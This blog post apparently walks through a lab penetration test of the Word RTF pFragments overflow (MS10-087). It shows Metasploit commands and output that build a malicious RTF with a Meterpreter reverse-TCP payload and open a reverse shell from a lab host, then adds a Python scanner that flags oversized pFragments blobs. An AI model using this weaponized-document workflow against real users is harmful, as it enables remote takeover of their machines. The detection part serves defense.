The previous post covered penetration testing a target host with a malicious PDF. This one briefly walks through the same attack using a Word file. If you have not read the previous post, read it first for the basic steps:
Penetration testing with a malicious PDF
| Test case | Description |
|---|---|
| Vulnerability | The handler for the pFragments shape property in Microsoft Word's RTF parser is vulnerable to a stack-based buffer overflow (MS10-087, CVE-2010-3333). |
| Affected systems | Microsoft Office XP SP, 2003 SP3, 2007 SP2, 2010 x32, 2010 x64, Microsoft Office for Mac 2011 |
Generate the malicious Word document
```
msf6 > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > options

Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rtf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit

[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
```
Start the handler. The fileformat module sets DisablePayloadHandler, so nothing is listening yet: use `exploit/multi/handler` with the payload, LHOST and LPORT set to the same values the document was generated with (windows/meterpreter/reverse_tcp, 192.168.1.113, 4444), run `exploit`, and then open the document on the target.
```
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.113:4444 -> 192.168.1.115:1885) at 2021-05-13 11:37:26 +0800

meterpreter >
```
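The defensive side of the same document, as an added example that is not code from the original post or from the Metasploit module: a small Python scanner that picks out the structural trait of an MS10-087 file, an RTF whose `pFragments` shape property carries a far larger data blob than any real drawing needs. It checks the RTF magic rather than the file extension, because Word sniffs content and an RTF renamed to `.doc` is parsed the same way. The `a;b;hexdata` layout of the value, the 256-byte threshold and the two sample documents are assumptions and constructed inputs, not measurements of the real overflowed buffer.

```python
#!/usr/bin/env python3
"""Flag RTF files carrying an oversized pFragments shape property.

Added example, not part of the original post. It only inspects the property
layout; it does not fully parse RTF and does not decode any payload.
"""
import re
import sys

# Word sniffs file content, so an RTF renamed to .doc is still parsed as RTF.
# Check the magic rather than the extension.
RTF_MAGIC = b"{\\rtf"

# Heuristic threshold (an assumption, not the size of the overflowed buffer):
# pFragments blobs in ordinary documents are small, so a large one deserves a look.
MAX_PFRAGMENTS_BYTES = 256

# Shape property groups look like {\sp{\sn NAME}{\sv VALUE}}. Values contain
# no braces, so [^{}]* stops at the right place.
SHAPE_PROP_RE = re.compile(
    rb"\{\\sp\s*\{\\sn\s+(?P<name>[A-Za-z0-9]+)\s*\}\s*\{\\sv\s*(?P<value>[^{}]*)\}\s*\}"
)
HEX_RE = re.compile(rb"^[0-9A-Fa-f]+$")


def is_rtf(data: bytes) -> bool:
    """True if the bytes start with the RTF magic, whatever the file name says."""
    return data.startswith(RTF_MAGIC)


def shape_properties(rtf: bytes):
    """Return (name, value) for every shape property group in the document."""
    return [(m.group("name").decode("ascii"), m.group("value").strip())
            for m in SHAPE_PROP_RE.finditer(rtf)]


def inspect_pfragments(value: bytes) -> dict:
    """Check one pFragments value.

    Assumed layout: 'a;b;hexdata', the form the exploit module writes.
    The two leading integers are reported as-is and not interpreted.
    """
    fields = value.split(b";")
    report = {"header": [f.decode("ascii", "replace") for f in fields[:2]],
              "blob_bytes": 0, "reasons": []}
    if len(fields) != 3:
        report["reasons"].append("unexpected field count: %d" % len(fields))
        return report
    blob = fields[2].strip()
    if not HEX_RE.match(blob) or len(blob) % 2:
        report["reasons"].append("data is not an even-length hex string")
        return report
    report["blob_bytes"] = len(blob) // 2
    if report["blob_bytes"] > MAX_PFRAGMENTS_BYTES:
        report["reasons"].append("oversized blob: %d bytes" % report["blob_bytes"])
    return report


def scan_rtf(data: bytes):
    """Return one report per pFragments property that looks suspicious."""
    findings = []
    for name, value in shape_properties(data):
        if name != "pFragments":
            continue
        report = inspect_pfragments(value)
        if report["reasons"]:
            findings.append(report)
    return findings


# Constructed samples (not files from the post): a shape with a tiny fragment
# list, and one whose 2000-byte blob of 0x41 stands in for an exploit payload.
_SHAPE = (b"{\\rtf1\\ansi{\\shp{\\*\\shpinst\\shpleft0\\shptop0"
          b"{\\sp{\\sn shapeType}{\\sv 1}}"
          b"{\\sp{\\sn pFragments}{\\sv %s}}}}hello}")
BENIGN_RTF = _SHAPE % b"1;4;00010203"
SUSPECT_RTF = _SHAPE % (b"9;2;" + b"41" * 2000)


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            data = fh.read()
        if not is_rtf(data):
            print("%s: not RTF" % path)
            continue
        for f in scan_rtf(data):
            print("%s: pFragments header=%s, %s"
                  % (path, f["header"], "; ".join(f["reasons"])))
```

Run it as `python3 scan_pfragments.py /root/.msf4/local/msf.rtf` (the path from the output above) to see the property the module planted. The threshold is deliberately loose; on a real mail gateway you would pair this with the rest of the shape group (a zero-sized `\shp` with a large `pFragments` blob is the combination worth alerting on) rather than the blob length alone.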